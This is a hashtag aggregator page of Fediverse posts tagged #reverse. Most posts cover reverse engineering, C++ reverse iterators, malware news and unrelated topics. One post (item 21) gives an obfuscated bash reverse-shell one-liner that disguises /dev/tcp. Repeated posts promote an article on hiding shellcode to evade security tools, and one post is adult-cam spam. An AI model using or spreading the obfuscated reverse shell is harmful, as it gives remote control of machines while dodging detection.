home.social

#reverse — Public Fediverse posts

Live and recent posts from across the Fediverse tagged #reverse, aggregated by home.social.

  1. 🔥 Blonde LIVE NOW (9688 watching) blonde_riderxxx • ? • US oilllll #lovense #lush #blonde #squirt #reverse cowgirl #oil #natural ... 👉 Watch FREE #nsfw #blonde #nsfwsky #LiveCams #Adult #Lovense #Lush #Blonde #Squirt #Reverse

  2. Реверс — это сканворд. Как я впервые нормально понял Ghidra

    Привет, Хабр. У меня бывают неожиданные заказы, из неожиданных сфер на фрилансе. Недавно писал про то как прилетел большой проект по классификатору фоток. А теперь пришел запрос на реверс! Не могу вдаваться в подробности проекта - много конфиденциального - но я расскажу про конкретный разбор одного .dll файла. Открыл Ghidra, кликнул на функцию, включил декомпилятор - и передо мной встала стена. Не метафорическая стена. Прям реально стена! И вот пока я эту функцию ковырял, переименовывал переменные, ходил по ссылкам, открывал соседние функции, смотрел строки, в какой-то момент меня щёлкнуло. Это же сканворд.

    habr.com/ru/articles/1029296/

    #reverse_engineering #ghidra #реверсинжиниринг #binary_analysis #dll #decompilation #xrefs #static_analysis #reverse #binary_parsing

  3. Реверс — это сканворд. Как я впервые нормально понял Ghidra

    Привет, Хабр. У меня бывают неожиданные заказы, из неожиданных сфер на фрилансе. Недавно писал про то как прилетел большой проект по классификатору фоток. А теперь пришел запрос на реверс! Не могу вдаваться в подробности проекта - много конфиденциального - но я расскажу про конкретный разбор одного .dll файла. Открыл Ghidra, кликнул на функцию, включил декомпилятор - и передо мной встала стена. Не метафорическая стена. Прям реально стена! И вот пока я эту функцию ковырял, переименовывал переменные, ходил по ссылкам, открывал соседние функции, смотрел строки, в какой-то момент меня щёлкнуло. Это же сканворд.

    habr.com/ru/articles/1029296/

    #reverse_engineering #ghidra #реверсинжиниринг #binary_analysis #dll #decompilation #xrefs #static_analysis #reverse #binary_parsing

  4. Реверс — это сканворд. Как я впервые нормально понял Ghidra

    Привет, Хабр. У меня бывают неожиданные заказы, из неожиданных сфер на фрилансе. Недавно писал про то как прилетел большой проект по классификатору фоток. А теперь пришел запрос на реверс! Не могу вдаваться в подробности проекта - много конфиденциального - но я расскажу про конкретный разбор одного .dll файла. Открыл Ghidra, кликнул на функцию, включил декомпилятор - и передо мной встала стена. Не метафорическая стена. Прям реально стена! И вот пока я эту функцию ковырял, переименовывал переменные, ходил по ссылкам, открывал соседние функции, смотрел строки, в какой-то момент меня щёлкнуло. Это же сканворд.

    habr.com/ru/articles/1029296/

    #reverse_engineering #ghidra #реверсинжиниринг #binary_analysis #dll #decompilation #xrefs #static_analysis #reverse #binary_parsing

  5. Реверс — это сканворд. Как я впервые нормально понял Ghidra

    Привет, Хабр. У меня бывают неожиданные заказы, из неожиданных сфер на фрилансе. Недавно писал про то как прилетел большой проект по классификатору фоток. А теперь пришел запрос на реверс! Не могу вдаваться в подробности проекта - много конфиденциального - но я расскажу про конкретный разбор одного .dll файла. Открыл Ghidra, кликнул на функцию, включил декомпилятор - и передо мной встала стена. Не метафорическая стена. Прям реально стена! И вот пока я эту функцию ковырял, переименовывал переменные, ходил по ссылкам, открывал соседние функции, смотрел строки, в какой-то момент меня щёлкнуло. Это же сканворд.

    habr.com/ru/articles/1029296/

    #reverse_engineering #ghidra #реверсинжиниринг #binary_analysis #dll #decompilation #xrefs #static_analysis #reverse #binary_parsing

  6. I don't spend nearly enough time breaking into people's switching stacks from first principles. I have been spoilt by weak passwords, SNMP, telnet and the like.

    #hardhacks, #reverse, #engineering, #redteam

  7. 🤣 Ah, the age-old tale of #developers bravely attempting to outsmart Google's #AI #watermark with the finesse of a blindfolded cat 🐱🔍. Meanwhile, #GitHub stands by with its arsenal of buzzwords and tools, ready to help you "detect" and "remove" your own sanity. Because nothing screams #innovation like #reverse #engineering a digital tattoo 😂.
    github.com/aloshdenny/reverse- #humor #HackerNews #ngated

  8. #reverse : a thrust in fencing made with a backward turn of the hand

    - French: inverse

    - Italian: contrario

    - Portuguese: inverso, inverter

    - Spanish: reverso

    ------------

    Thank you so much for being a member of our community!

  9. #OysterLoader (aka #Broomstick or #Cleanup) is not just another downloader. Often serving as a precursor to #Rhysida #ransomware campaigns or distributing commodity malware such as #Vidar, this threat has evolved significantly as we enter 2026.

    blog.sekoia.io/oysterloader-un

    #Reverse

  10. @AnachronistJohn @stefano @Timpostma

    I'm interested to test it out. I'll tell you when I have internet again. ATM I'm at a schatje (NL) of mine

    #Test #Bèta #Proxy #reverse

  11. Can-Fite Announces Reverse Split of its Ordinary Shares and ADS Ratio Change

    RAMAT GAN, Israel, Dec. 23, 2025 (GLOBE NEWSWIRE) — Can-Fite BioPharma Ltd. (NYSE American: CANF) (TASE: CANF), a…
    #Israel #News #Ads #And #announces #Can-Fite #change #ITS #of #ordinary #Ratio #Reverse #Shares #split #telaviv
    europesays.com/2653346/

  12. Ah, yes, the groundbreaking revelation that #Valve is somehow embodying an #Apple role in #reverse 🤔—a story so compelling it requires readers to first master the ancient art of enabling #JavaScript and #cookies. 🍪✨ Perhaps next they'll suggest #Steam #Machines as the new iPhone, but only if you stand on your head while logging in. 🙃📉
    garbagecollected.dev/p/valve-t #HackerNews #ngated

  13. Hey Fedi!
    I have a cheap logic analyzer that I want to use on an #SMD #esp32s3, the difficulty is to make sure the probes stays in place while doing aquisitions. For now I use dupont wires, but it's obviously not going well.
    What is the kind of probes that should be used in those cases?
    #diy #esp32 #reverse

    Boost welcome :)

  14. 🔗 "How I accidentally became PureGym's unofficial Apple Wallet developer"

    Vadim Drobinin, frustrated with his gym app, reverse engineers the API and makes it Apple Wallet compatible to save a whooping 3.2h each year when going into the gym. This post is why I love being a programmer - finding an issue, working around it, making things work. Beautiful.

    👉

    Engineering kevingimbel.de/link-blog/re-ht

  15. #FYI #OceanCirculation #Antarctic #SMOC #reverse

    Original open access article

    Silvano et al. June 30, 2025 Proc. Natl. Acad. Sci. U.S.A. 122 (27) e2500440122

    Rising surface salinity and declining sea ice: A new Southern Ocean state revealed by satellites
    doi.org/10.1073/pnas.2500440122

  16. #FYI #OceanCirculation #Antarctic #SMOC #reverse

    Original open access article

    Silvano et al. June 30, 2025 Proc. Natl. Acad. Sci. U.S.A. 122 (27) e2500440122

    Rising surface salinity and declining sea ice: A new Southern Ocean state revealed by satellites
    doi.org/10.1073/pnas.2500440122

  17. Прячем shellcode в приложениях

    В этой статье мы рассмотрим одну из наиболее эффективных техник обхода традиционных систем защиты — сокрытие шеллкода. Уязвимости в программном обеспечении могут стать отличной возможностью для злоумышленников, а шеллкод, благодаря своей компактности и скрытности, становится идеальным инструментом для эксплуатации таких уязвимостей. Мы не только объясним, как скрывают вредоносный код, но и подробно рассмотрим методы преобразования стандартных исполняемых файлов в шеллкод, а также покажем, как этот процесс может быть использован для обхода современных средств защиты.

    habr.com/ru/companies/otus/art

    #reverseengineering #exploit #shellcode #payload #windows_internals #reverse #reverse_engineering

  18. Прячем shellcode в приложениях

    В этой статье мы рассмотрим одну из наиболее эффективных техник обхода традиционных систем защиты — сокрытие шеллкода. Уязвимости в программном обеспечении могут стать отличной возможностью для злоумышленников, а шеллкод, благодаря своей компактности и скрытности, становится идеальным инструментом для эксплуатации таких уязвимостей. Мы не только объясним, как скрывают вредоносный код, но и подробно рассмотрим методы преобразования стандартных исполняемых файлов в шеллкод, а также покажем, как этот процесс может быть использован для обхода современных средств защиты.

    habr.com/ru/companies/otus/art

    #reverseengineering #exploit #shellcode #payload #windows_internals #reverse #reverse_engineering

  19. Прячем shellcode в приложениях

    В этой статье мы рассмотрим одну из наиболее эффективных техник обхода традиционных систем защиты — сокрытие шеллкода. Уязвимости в программном обеспечении могут стать отличной возможностью для злоумышленников, а шеллкод, благодаря своей компактности и скрытности, становится идеальным инструментом для эксплуатации таких уязвимостей. Мы не только объясним, как скрывают вредоносный код, но и подробно рассмотрим методы преобразования стандартных исполняемых файлов в шеллкод, а также покажем, как этот процесс может быть использован для обхода современных средств защиты.

    habr.com/ru/companies/otus/art

    #reverseengineering #exploit #shellcode #payload #windows_internals #reverse #reverse_engineering

  20. Прячем shellcode в приложениях

    В этой статье мы рассмотрим одну из наиболее эффективных техник обхода традиционных систем защиты — сокрытие шеллкода. Уязвимости в программном обеспечении могут стать отличной возможностью для злоумышленников, а шеллкод, благодаря своей компактности и скрытности, становится идеальным инструментом для эксплуатации таких уязвимостей. Мы не только объясним, как скрывают вредоносный код, но и подробно рассмотрим методы преобразования стандартных исполняемых файлов в шеллкод, а также покажем, как этот процесс может быть использован для обхода современных средств защиты.

    habr.com/ru/companies/otus/art

    #reverseengineering #exploit #shellcode #payload #windows_internals #reverse #reverse_engineering

  21. #Reverse #shell en #Bash

    /*/b?s? -i >& `echo /d*/``echo top | sed s/o/c/`/2130706433/9999 0>&1

    No te pierdas los trucos de #ROOR08
    #hacking

  22. #introduction

    #developer from #germany - #westerwald

    I have fun with #diy, #electronics, #programming, #cnc-machining, #3dprinting, #cocktail-robots, #reverse-engineering, ... - check my website.

    Special love for #angola and #equatorial-guinea - interested in #startups and #entrepreneurship - enjoy watching #birds and going on walks - probably old.

    Want to have a pluralistic, diverse and open-minded society.

    I'll try to focus on the positive and not rant too much.

  23. Reverse Iterations

    Sometimes, we all need a way to iterate over a container in the opposite direction. There are several ways to reverse-iterate a container, and in this article, we’ll explore them.

    Index Iteration

    Probably the simplest way, taken from C is to iterate using an index location:

    for (int64_t index = ssize(container) - 1; index >= 0; --index) {    // do something with `container[index]`}

    This way is highly not recommended as it might lead to infinite loops if done incorrectly (for example by using uint64_t or size_t for the index type), and you can find more issues with this way in some previous articles about iterators in this blog.

    Reverse Iterators

    Another way to iterate a container is by using reverse iterators (rbegin() and rend()):

    for (auto it = container.rbegin(); it != container.rend(); ++it) {    // do something with `*it`}

    This is a more recommended way, but it might be a little bit frustrating compared to a regular for-range loop:

    for (auto elem : container) { /*do something with `elem`*/ }

    The closest way to this method using the standard (before C++20) is:

    std::for_each(container.rbegin(), container.rend(), [](auto elem) {    // so something with `elem`});

    Ranges (C++20)

    If you are using the ranges library, or using at least C++20, you can use the following method to iterate a container in reverse order:

    for (auto elem : container | std::views::reverse) {    // do something with `elem`}

    Custom Reverse Container View

    Another way to use the for-range loop (even if you don’t use C++20 or the ranges library), is to create your own container mask, to modify the behavior of the begin() and end() functions:

    template <typename T>class reverse_view {public:    reverse_view(T& cont) : container(&cont) {}        typename T::reverse_iterator begin() { return container->rbegin(); }    typename T::reverse_iterator end() { return container->rend(); }    private:    T* container;};

    Then, you’ll be able to use it like that:

    std::vector<int> container = {1, 2, 3, 4, 5};for (int elem : reverse_view(container)) {    std::cout << elem << ", ";}

    More Ways

    I hope you learned something new, and feel free to share in the comments if you know other ways to reverse-iterate over a container.

    #advanced #C_ #c11 #c14 #c17 #c20 #containers #Intermediate #Iterators #ranges #reverse #reverseIterators

  24. Listen to a song, then play it backwards. You get a completely different perspective, and a new song too! #music #listen #backwards #reversed #reverse #backward #different

    Just thought I would bring this up.